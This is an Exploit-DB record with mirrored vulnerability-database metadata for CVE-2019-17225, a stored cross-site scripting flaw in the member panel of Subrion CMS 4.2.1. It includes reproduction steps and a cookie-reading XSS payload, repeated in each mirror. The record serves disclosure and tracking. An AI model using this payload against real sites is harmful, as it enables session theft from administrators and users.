ID EDB-ID:47469 Type exploitdb Reporter Exploit-DB Modified 2019-10-07T00:00:00
Description
# Title: Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting
# Date: 2019-10-07
# Author: Min Ko Ko (Creatigon)
# Vendor Homepage: https://subrion.org/
# CVE : https://nvd.nist.gov/vuln/detail/CVE-2019-17225
# Website : https://l33thacker.com
# Description : Allows XSS via the panel/members/ Username, Full Name, or
# Email field, aka an "Admin Member JSON Update" issue.
First login the panel with user credential, Go to member tag from left menu.
http://localhost/panel/members/
Username, Full Name, Email are editable with double click on it. Insert the
following payload
<img src=x onerror=alert(document.cookie)>
{"id": "EDB-ID:47469", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting", "description": "", "published": "2019-10-07T00:00:00", "modified": "2019-10-07T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/47469", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2019-17225"], "lastseen": "2019-10-07T11:43:33", "viewCount": 164, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-17225"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154746"]}, {"type": "zdt", "idList": ["1337DAY-ID-33333"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:EE79AA06B19DD30C3A277869A2AA02AC"]}], "modified": "2019-10-07T11:43:33", "rev": 2}, "score": {"value": 3.3, "vector": "NONE", "modified": "2019-10-07T11:43:33", "rev": 2}, "vulnersScore": 3.3}, "sourceHref": "https://www.exploit-db.com/download/47469", "sourceData": "# Title: Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting\r\n# Date: 2019-10-07\r\n# Author: Min Ko Ko (Creatigon)\r\n# Vendor Homepage: https://subrion.org/\r\n# CVE : https://nvd.nist.gov/vuln/detail/CVE-2019-17225\r\n# Website : https://l33thacker.com\r\n# Description : Allows XSS via the panel/members/ Username, Full Name, or\r\n# Email field, aka an \"Admin Member JSON Update\" issue.\r\n\r\nFirst login the panel with user credential, Go to member tag from left menu.\r\n\r\nhttp://localhost/panel/members/\r\n\r\nUsername, Full Name, Email are editable with double click on it. Insert the\r\nfollowing payload\r\n\r\n<img src=x onerror=alert(document.cookie)>", "osvdbidlist": []}
{"cve": [{"lastseen": "2021-02-02T07:12:55", "description": "Subrion 4.2.1 allows XSS via the panel/members/ Username, Full Name, or Email field, aka an \"Admin Member JSON Update\" issue.", "edition": 5, "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.4, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2019-10-06T17:15:00", "title": "CVE-2019-17225", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-17225"], "modified": "2019-10-08T14:10:00", "cpe": ["cpe:/a:intelliants:subrion:4.2.1"], "id": "CVE-2019-17225", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-17225", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:intelliants:subrion:4.2.1:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2019-12-04T16:01:41", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2019-10-07T00:00:00", "title": "Subrion 4.2.1 - (Email) Persistant Cross-Site Scripting Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-17225"], "modified": "2019-10-07T00:00:00", "id": "1337DAY-ID-33333", "href": "https://0day.today/exploit/description/33333", "sourceData": "# Title: Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting\r\n# Author: Min Ko Ko (Creatigon)\r\n# Vendor Homepage: https://subrion.org/\r\n# CVE : https://nvd.nist.gov/vuln/detail/CVE-2019-17225\r\n# Website : https://l33thacker.com\r\n# Description : Allows XSS via the panel/members/ Username, Full Name, or\r\n# Email field, aka an \"Admin Member JSON Update\" issue.\r\n\r\nFirst login the panel with user credential, Go to member tag from left menu.\r\n\r\nhttp://localhost/panel/members/\r\n\r\nUsername, Full Name, Email are editable with double click on it. Insert the\r\nfollowing payload\r\n\r\n<img src=x onerror=alert(document.cookie)>\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "sourceHref": "https://0day.today/exploit/33333"}], "packetstorm": [{"lastseen": "2019-10-08T14:51:01", "description": "", "published": "2019-10-07T00:00:00", "type": "packetstorm", "title": "Subrion 4.2.1 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-17225"], "modified": "2019-10-07T00:00:00", "id": "PACKETSTORM:154746", "href": "https://packetstormsecurity.com/files/154746/Subrion-4.2.1-Cross-Site-Scripting.html", "sourceData": "`# Title: Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting \n# Date: 2019-10-07 \n# Author: Min Ko Ko (Creatigon) \n# Vendor Homepage: https://subrion.org/ \n# CVE : https://nvd.nist.gov/vuln/detail/CVE-2019-17225 \n# Website : https://l33thacker.com \n# Description : Allows XSS via the panel/members/ Username, Full Name, or \n# Email field, aka an \"Admin Member JSON Update\" issue. \n \nFirst login the panel with user credential, Go to member tag from left menu. \n \nhttp://localhost/panel/members/ \n \nUsername, Full Name, Email are editable with double click on it. Insert the \nfollowing payload \n \n<img src=x onerror=alert(document.cookie)> \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/154746/subrion421email-xss.txt"}], "exploitpack": [{"lastseen": "2020-04-01T20:40:43", "description": "\nSubrion 4.2.1 - Email Persistant Cross-Site Scripting", "edition": 1, "published": "2019-10-07T00:00:00", "title": "Subrion 4.2.1 - Email Persistant Cross-Site Scripting", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-17225"], "modified": "2019-10-07T00:00:00", "id": "EXPLOITPACK:EE79AA06B19DD30C3A277869A2AA02AC", "href": "", "sourceData": "# Title: Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting\n# Date: 2019-10-07\n# Author: Min Ko Ko (Creatigon)\n# Vendor Homepage: https://subrion.org/\n# CVE : https://nvd.nist.gov/vuln/detail/CVE-2019-17225\n# Website : https://l33thacker.com\n# Description : Allows XSS via the panel/members/ Username, Full Name, or\n# Email field, aka an \"Admin Member JSON Update\" issue.\n\nFirst login the panel with user credential, Go to member tag from left menu.\n\nhttp://localhost/panel/members/\n\nUsername, Full Name, Email are editable with double click on it. Insert the\nfollowing payload\n\n<img src=x onerror=alert(document.cookie)>", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}]}
